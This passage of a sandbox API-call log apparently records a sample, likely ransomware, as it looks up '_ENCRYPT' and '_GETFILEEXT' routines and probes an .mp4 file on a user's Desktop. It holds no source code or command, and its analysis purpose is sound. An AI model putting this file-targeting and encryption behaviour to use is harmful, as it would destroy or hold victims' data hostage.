lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0161.886] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4f8 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd948 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda98 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.886] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.887] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.887] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.887] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0161.887] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0161.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd648 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0161.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd828 [0161.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0161.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.888] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0161.888] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.888] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b00 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.889] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0161.889] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd870 [0161.889] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.889] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0161.889] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0161.890] CloseHandle (hObject=0x120) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0161.890] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0161.890] FreeLibrary (hLibModule=0x75990000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0161.890] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd648 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0161.891] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0161.891] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0161.891] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0161.891] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0161.891] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0161.891] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0161.891] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0161.892] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0161.892] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="p4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0161.892] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mp4", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0161.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x70) returned 0x906f38 [0161.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.892] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a30 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de830 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.892] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0xf7a7c0f0, ftLastWriteTime.dwHighDateTime=0x1d5de94, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 0x90add8 [0161.893] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.893] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1d30 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de858 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd720 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0161.893] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ab10d10, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xf7a7c0f0, ftLastAccessTime.dwHighDateTime=0x1d5de94, ftLastWriteTime.dwLowDateTime=0xf7a7c0f0, ftLastWriteTime.dwHighDateTime=0x1d5de94, nFileSizeHigh=0x0, nFileSizeLow=0x13f6b, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="Iu4ghlu.mp4", cAlternateFileName="")) returned 0x90add8 [0161.893] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0161.893] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0161.893] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0161.893] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Iu4ghlu.mp4\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0161.894] CompareStringW (Locale=0x400, 